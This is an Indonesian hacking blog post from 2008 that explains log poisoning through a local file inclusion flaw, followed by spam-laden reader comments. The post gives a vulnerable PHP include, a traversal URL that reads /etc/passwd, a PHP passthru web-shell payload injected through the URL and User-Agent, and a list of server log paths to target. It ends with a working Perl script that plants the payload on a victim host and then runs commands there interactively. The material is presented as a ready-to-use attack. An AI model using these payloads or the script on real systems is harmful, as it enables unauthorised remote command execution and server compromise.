Wednesday, 7 May 2008

file Logs Sebagai Pintu alternatif (LFI exploitation)

Kali ini posting aq serius gak akan ada kata bugil , gadis telanjang , foto artis bugil , foto

dewi persik bugil, dll ( padahal tetep ada tuh ;p )


// chapter 1 --- LOgs ANd LFI

ok , file log sendiri merupakan file yang berisi mengenai aktifitas2 komputer dan aktifitas yang

dilakukan di server , blah apa iki maksudnye begini - begini singkat kata file logs adalah file

yang berisi tentang aktifitas/Kegiatan di komputer(server).
Jd semua akses yang dilakukan kita akan di catat di file ini

Local File inclusion(LFI) sendiri dapat di artikan sebagai penyisipan file yang ada di local


//chapter 2 --- The Bug (LFI Concept)

contoh code yang terkena LFI

< ?php
$page = $_GET[page];
include($page);
? >


pada kode ini terlihat jelas variable Page tidak terfilter , dengan modifikasi url seperti

dibawah seorang penyerang dapat meload dan mengesekusi file tsb

http://Injek.injekkan.com/index.php?page=../../../../../../../etc/passwd


dan hasilnya akan terlihat isi dari file /etc/passwd


//chapter 3 --- fuck'n file logs

seperti yang sudah aq kasih tau diatas bahwa file logs mencatat semua aktifitas yang ada diserver , termasuk url yang sudah di modifikasi :) .

yah dengan memasukan <? passthru($_GET[cmd]) ?> pada url aq bisa menjalankan perintah pada server.

kenapa ?????? ingat file log akan mencatat semua aktifitas di dalam server,

  • manipulasi url menjadi --> http://Injek.injekkan.com/<? passthru($_GET[cmd]) ?>
  • file <? passthru($_GET[cmd]) ?> tidak terdapat di server , dan webserver akan mencatat di file log ( biasanya error_log )
  • get your shellllllllllllllllll ............... in http://Injek.injekkan.com/../../../../../../../etc/httpd/logs/error_log?cmd=your_command_shell .....



secara default file log tersimpan disini

../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log



//chapter 4 --- THe script


use LWP::UserAgent;
$korban="victim.com";
$path="/folder/";
$code="<? passthru($_GET[cmd]) ?>";
$log = "../../../../../../../etc/httpd/logs/error_log";

print "Trying to inject the code";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$korban", PeerPort=>"80") or die "

Connection Failed. ";
print $socket "GET ".$path.$code." HTTP/1.1 ";
print $socket "User-Agent: ".$code." ";
print $socket "Host: ".$korban." ";
print $socket "Connection: close ";
close($socket);
print " Code $code sucssefully injected in $log ";

print " Type command to run or exit to end: ";
$cmd = <STDIN>;

while($cmd !~ "exit") {

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$korban", PeerPort=>"80") or die "

Connection Failed. ";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1 ";
print $socket "Host: ".$korban." ";
print $socket "Accept: */* ";
print $socket "Connection: close ";

while ($show = <$socket>)
{
print $show;
}

print "Type command to run or exit to end: ";
$cmd = <STDIN>;
}


referensi
e-rdc.org
rstzone.org
Diposting oleh di
Label: ,

16 comments:

  1. grosir baJu anak5 June 2010 at 19:53

    pertamaXx kah

    ReplyDelete
  2. obat kolesterol7 January 2011 at 17:00

    wah mantap juga ni infonya,,,, langsung kita cobain deh

    ReplyDelete
  3. jally gamat14 January 2011 at 20:58

    mantap juga ni,, kita langsung aja ke tkp

    ReplyDelete
  4. butik baju online3 January 2012 at 21:23

    Terimakasih mas bro...

    ReplyDelete
  5. design a book cover18 January 2012 at 22:34

    Kepalaku malah jadi pusing Gan lihat script-script diatas. Walau agak paham html tapi nggak terbiasa dengan huruf-huruf yang dirajut tu. Hebat Anda...

    ReplyDelete
  6. bunuh diri11 February 2012 at 08:00

    walaupun alternatif, akan tetap digunakan..

    ReplyDelete
  7. pengobatan gagal ginjal27 May 2012 at 09:08

    nice post gan :D

    ReplyDelete
  8. pengobatan kelenjar getah bening27 May 2012 at 09:08

    izin baca deh

    ReplyDelete
  9. pengobatan stroke27 May 2012 at 09:09

    smoga bermanfaat gan

    ReplyDelete
  10. obat kanker usus8 July 2012 at 21:59

    file yang sangat bagus gan :D

    ReplyDelete
  11. obat herbal xamthone plus3 August 2012 at 20:43

    waw,,,artikelnya berkelas neh,,,,

    ReplyDelete
  12. brankas file4 September 2012 at 01:54

    sricpt yang di gunakan ini berbahaya apa tidak?
    karena menurut saya jika logs file dengan menggunakan banyak script nnti nya akan menyebabkan eror pada batch file.

    ReplyDelete
  13. Dead Breath, Band Metal Yang Memegang Teguh Ajaran Islam14 November 2012 at 22:58

    wow keren..:)

    ReplyDelete
  14. Obat Penyakit Gondok Herbal8 January 2013 at 23:11

    masih belum ngerti dan faham..
    #jujur dari lubuk hati paling dalam

    ReplyDelete
  15. Obat Herbal Kanker Payudara15 January 2013 at 18:44

    kenapa ga pake douglas keylogger aja ....

    ReplyDelete
  16. salim1 July 2013 at 02:07

    Keeping Up with the Kardashians Season 8 Episode 5

    Keeping Up with the Kardashians Season 8 Episode 5 Online

    ReplyDelete

SILAHKAN SPAMMM, BLOG INI TANPA MODERASI :D


Untuk Link anda Silahkan Gunakan http:// cth http://domainanda

Subscribe to: Post Comments (Atom)